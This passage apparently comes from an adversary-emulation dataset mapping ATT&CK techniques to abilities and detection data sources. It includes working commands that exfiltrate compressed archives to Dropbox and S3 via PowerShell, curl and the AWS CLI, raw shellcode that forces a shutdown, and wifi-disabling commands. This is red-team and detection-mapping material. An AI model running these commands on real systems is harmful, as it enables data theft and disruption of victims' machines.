'application/octet-stream';\n$req.ContentLength = $file.length;\n$req.TimeOut = 50000;\n$req.KeepAlive = $true;\n$req.Headers.Add(\"Keep-Alive: 300\");\n$reqst = $req.getRequestStream();\n$reqst.write($file, 0, $file.length);\n$reqst.flush();\n$reqst.close();\n\n[net.httpWebResponse] $res = $req.getResponse();\n$resst = $res.getResponseStream();\n$sr = new-object IO.StreamReader($resst);\n$result = $sr.ReadToEnd();\n$result;\n$res.close();\n", + "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -X POST https://content.dropboxapi.com/2/files/upload\n --header \"Authorization: Bearer #{dropbox.api.key}\"\n 
--header \"Dropbox-API-Arg: {\\\"path\\\": \\\"/#{dropbox.target.dir}/$RemoteName\\\",\\\"mode\\\": \\\"add\\\",\\\"autorename\\\": true,\\\"mute\\\": false,\\\"strict_conflict\\\": false}\"\n --header \"Content-Type: application/octet-stream\"\n --data-binary @#{host.dir.compress}\n", + "s3upload \"#{host.dir.compress}\" \"#{s3.source.region}\" \"#{s3.source.name}\" \"aws-#{paw}-compressed\" 45s\n", + "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n", + "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n" + ], + "commands": [ + { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$TargetFilePath = \"/#{dropbox.target.dir}/$RemoteName\";\n$ApiKey = \"#{dropbox.api.key}\";\n\n$url = \"https://content.dropboxapi.com/2/files/upload\";\n\n$file = [IO.File]::ReadAllBytes($SourceFile);\n[net.httpWebRequest] $req = [net.webRequest]::create($url);\n\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }';\n$authorization = \"Bearer \" + $ApiKey;\n\n$req.method = \"POST\";\n$req.Headers.Add(\"Authorization\", $authorization);\n$req.Headers.Add(\"Dropbox-API-Arg\", $arg);\n$req.ContentType = 'application/octet-stream';\n$req.ContentLength = $file.length;\n$req.TimeOut = 50000;\n$req.KeepAlive = $true;\n$req.Headers.Add(\"Keep-Alive: 300\");\n$reqst = $req.getRequestStream();\n$reqst.write($file, 0, $file.length);\n$reqst.flush();\n$reqst.close();\n\n[net.httpWebResponse] $res = $req.getResponse();\n$resst = $res.getResponseStream();\n$sr = new-object IO.StreamReader($resst);\n$result = $sr.ReadToEnd();\n$result;\n$res.close();\n", + "source": 
"data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml", + "name": "This will exfiltrate an archive to Dropbox." + }, + { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -X POST https://content.dropboxapi.com/2/files/upload\n --header \"Authorization: Bearer #{dropbox.api.key}\"\n --header \"Dropbox-API-Arg: {\\\"path\\\": \\\"/#{dropbox.target.dir}/$RemoteName\\\",\\\"mode\\\": \\\"add\\\",\\\"autorename\\\": true,\\\"mute\\\": false,\\\"strict_conflict\\\": false}\"\n --header \"Content-Type: application/octet-stream\"\n --data-binary @#{host.dir.compress}\n", + "source": "data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml", + "name": "This will exfiltrate an archive to Dropbox." + }, + { + "command": "s3upload \"#{host.dir.compress}\" \"#{s3.source.region}\" \"#{s3.source.name}\" \"aws-#{paw}-compressed\" 45s\n", + "source": "data/abilities/exfiltration/dd4d3d6f-be0a-4d80-ada2-0b7f3228d2dc.yml", + "name": "Use the AWS SDK for GoLang to upload the compressed archive to the provided S3 bucket.\nIt is assumed that the current user credentials have the proper permissions to write to the target S3 bucket.\nRequires the agent to be compiled with the native_aws extension.\nTimeout set to 45 seconds.\n" + }, + { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n", + "source": "data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml", + "name": "Exfiltrate the compressed archive to the provided S3 bucket using the AWS CLI. 
It is assumed that the user\ncredentials configured with AWS CLI have the proper permissions to write to the target S3 bucket.\n" + }, + { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n", + "source": "data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml", + "name": "Exfiltrate the compressed archive to the provided S3 bucket using the AWS CLI. It is assumed that the user\ncredentials configured with AWS CLI have the proper permissions to write to the target S3 bucket.\n" + } + ], + "parsed_datasets": [ + { + "id": "3ce95a28-25fc-4a7e-a0cd-0fdb190e2081", + "name": "Exfil Compressed Archive to Dropbox", + "description": "This will exfiltrate an archive to Dropbox.", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.002", + "name": "Exfiltration to Cloud Storage" + }, + "platforms": { + "windows": { + "psh": { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$TargetFilePath = \"/#{dropbox.target.dir}/$RemoteName\";\n$ApiKey = \"#{dropbox.api.key}\";\n\n$url = \"https://content.dropboxapi.com/2/files/upload\";\n\n$file = [IO.File]::ReadAllBytes($SourceFile);\n[net.httpWebRequest] $req = [net.webRequest]::create($url);\n\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }';\n$authorization = \"Bearer \" + $ApiKey;\n\n$req.method = \"POST\";\n$req.Headers.Add(\"Authorization\", $authorization);\n$req.Headers.Add(\"Dropbox-API-Arg\", $arg);\n$req.ContentType = 'application/octet-stream';\n$req.ContentLength = $file.length;\n$req.TimeOut = 50000;\n$req.KeepAlive = $true;\n$req.Headers.Add(\"Keep-Alive: 300\");\n$reqst = $req.getRequestStream();\n$reqst.write($file, 0, $file.length);\n$reqst.flush();\n$reqst.close();\n\n[net.httpWebResponse] $res = 
$req.getResponse();\n$resst = $res.getResponseStream();\n$sr = new-object IO.StreamReader($resst);\n$result = $sr.ReadToEnd();\n$result;\n$res.close();\n" + } + }, + "linux": { + "sh": { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -X POST https://content.dropboxapi.com/2/files/upload\n --header \"Authorization: Bearer #{dropbox.api.key}\"\n --header \"Dropbox-API-Arg: {\\\"path\\\": \\\"/#{dropbox.target.dir}/$RemoteName\\\",\\\"mode\\\": \\\"add\\\",\\\"autorename\\\": true,\\\"mute\\\": false,\\\"strict_conflict\\\": false}\"\n --header \"Content-Type: application/octet-stream\"\n --data-binary @#{host.dir.compress}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + }, + { + "id": "dd4d3d6f-be0a-4d80-ada2-0b7f3228d2dc", + "name": "Exfil Compressed Archive to S3 via Golang", + "description": "Use the AWS SDK for GoLang to upload the compressed archive to the provided S3 bucket.\nIt is assumed that the current user credentials have the proper permissions to write to the target S3 bucket.\nRequires the agent to be compiled with the native_aws extension.\nTimeout set to 45 seconds.\n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.002", + "name": "Exfiltration to Cloud Storage" + }, + "platforms": { + "linux,windows,darwin": { + "native": { + "command": "s3upload \"#{host.dir.compress}\" \"#{s3.source.region}\" \"#{s3.source.name}\" \"aws-#{paw}-compressed\" 45s\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + }, + { + "id": "e7bf5dc7-62e4-48b2-acf8-abaf8734c19c", + "name": "Exfil Compressed Archive to S3 via AWS CLI", + "description": "Exfiltrate the compressed archive to the provided S3 bucket using the AWS CLI. 
It is assumed that the user\ncredentials configured with AWS CLI have the proper permissions to write to the target S3 bucket.\n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.002", + "name": "Exfiltration to Cloud Storage" + }, + "platforms": { + "linux": { + "sh": { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n", + "cleanup": "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 rm s3://#{s3.source.name}/$RemoteName;\n" + } + }, + "windows": { + "psh": { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;\n", + "cleanup": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 rm s3://#{s3.source.name}/$RemoteName;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1537", + "command_list": [ + "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n", + "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n" + ], + "commands": [ + { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n", + "source": "data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml", + "name": "Transfer the compressed archive from one S3 bucket to another S3 bucket via AWS CLI. 
It is assumed that the proper\npolicies and security rules are in place to allow reading from the source bucket and writing to the destination\nbucket.\n" + }, + { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n", + "source": "data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml", + "name": "Transfer the compressed archive from one S3 bucket to another S3 bucket via AWS CLI. It is assumed that the proper\npolicies and security rules are in place to allow reading from the source bucket and writing to the destination\nbucket.\n" + } + ], + "parsed_datasets": [ + { + "id": "ba0deadb-97ac-4a4c-aa81-21912fc90980", + "name": "Transfer Compressed Archive to Separate S3 Bucket via AWS CLI", + "description": "Transfer the compressed archive from one S3 bucket to another S3 bucket via AWS CLI. It is assumed that the proper\npolicies and security rules are in place to allow reading from the source bucket and writing to the destination\nbucket.\n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1537", + "name": "Transfer Data to Cloud Account" + }, + "platforms": { + "linux": { + "sh": { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"exfil-#{paw}-$(basename $LocalFile)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n" + } + }, + "windows": { + "psh": { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"exfil-#{paw}-$($SourceFile.name)\";\naws s3 cp s3://#{s3.source.name}/$RemoteName s3://#{s3.destination.name} --acl bucket-owner-full-control;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": 
"snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot creation", + "description": "A snapshot was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "snapshot" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot modification", + "description": "A snapshot was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "snapshot" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage modification", + "description": "A cloud storage was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "cloud storage bucket" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage modification", + "description": "A cloud storage was modified.", + "source_data_element": "modified", + "relationship": "created", + "target_data_element": "cloud storage object" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage creation", + "description": "A cloud storage was created.", + "source_data_element": "user", 
+ "relationship": "created", + "target_data_element": "cloud storage bucket" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage creation", + "description": "A cloud storage was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "cloud storage object" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ], + [ + "https://aws.amazon.com/s3/", + "https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ] + ] + }, + { + "technique_id": "T1499", + "command_list": [ + "0x48, 0x31, 0xc0, 0x48, 0x31, 0xd2, 0x50, 0x6a, 0x77, 0x66, 0x68, 0x6e, 0x6f, 0x48, 0x89, 0xe3, 0x50, 0x66, 0x68, 0x2d, 0x68, 0x48, 0x89, 0xe1, 0x50, 0x49, 0xb8, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x49, 0xba, 0x73, 0x68, 0x75, 0x74, 0x64, 0x6f, 0x77, 0x6e, 0x41, 0x52, 0x41, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x53, 0x51, 0x57, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xc0, 0x3b, 0x0f, 0x05\n", + "./wifi.sh off\n", + ".\\wifi.ps1 -Off\n" + ], + "commands": [ + { + "command": "0x48, 0x31, 0xc0, 0x48, 0x31, 0xd2, 0x50, 0x6a, 0x77, 0x66, 0x68, 0x6e, 0x6f, 0x48, 0x89, 0xe3, 0x50, 0x66, 0x68, 0x2d, 0x68, 0x48, 0x89, 0xe1, 0x50, 0x49, 0xb8, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x49, 0xba, 0x73, 0x68, 0x75, 0x74, 0x64, 0x6f, 0x77, 0x6e, 0x41, 0x52, 0x41, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x53, 0x51, 0x57, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xc0, 0x3b, 0x0f, 0x05\n", + "source": "data/abilities/impact/0821b0b0-7902-4a7b-8052-80bda5a43684.yml", + "name": "Force shutdown a target system using Process Injection and raw shellcode" + }, + { + "command": "./wifi.sh off\n", + 
"source": "data/abilities/impact/2fe2d5e6-7b06-4fc0-bf71-6966a1226731.yml", + "name": "Turn a computers WIFI off" + }, + { + "command": ".\\wifi.ps1 -Off\n", + "source": "data/abilities/impact/2fe2d5e6-7b06-4fc0-bf71-6966a1226731.yml", + "name": "Turn a computers WIFI off" + } + ], + "parsed_datasets": [ + { + "id": "0821b0b0-7902-4a7b-8052-80bda5a43684", + "name": "Shutdown Target System", + "description": "Force shutdown a target system using Process Injection and raw shellcode", + "tactic": "impact", + "technique": { + "attack_id": "T1499", + "name": "Endpoint Denial of Service" + }, + "platforms": { + "linux": { + "shellcode_amd64,shellcode_386": { + "command": "0x48, 0x31, 0xc0, 0x48, 0x31, 0xd2, 0x50, 0x6a, 0x77, 0x66, 0x68, 0x6e, 0x6f, 0x48, 0x89, 0xe3, 0x50, 0x66, 0x68, 0x2d, 0x68, 0x48, 0x89, 0xe1, 0x50, 0x49, 0xb8, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x49, 0xba, 0x73, 0x68, 0x75, 0x74, 0x64, 0x6f, 0x77, 0x6e, 0x41, 0x52, 0x41, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x53, 0x51, 0x57, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xc0, 0x3b, 0x0f, 0x05\n" + } + } + } + }, + { + "id": "2fe2d5e6-7b06-4fc0-bf71-6966a1226731", + "name": "Disrupt WIFI", + "description": "Turn a computers WIFI off", + "tactic": "impact", + "technique": { + "attack_id": "T1499", + "name": "Endpoint Denial of Service" + }, + "platforms": { + "darwin": { + "sh": { + "command": "./wifi.sh off\n", + "cleanup": "./wifi.sh on\n", + "payloads": [ + "wifi.sh" + ] + } + }, + "linux": { + "sh": { + "command": "./wifi.sh off\n", + "cleanup": "./wifi.sh on\n", + "payloads": [ + "wifi.sh" + ] + } + }, + "windows": { + "psh": { + "command": ".\\wifi.ps1 -Off\n", + "cleanup": ".\\wifi.ps1 -On\n", + "payloads": [ + "wifi.ps1" + ] + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + 
"Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as 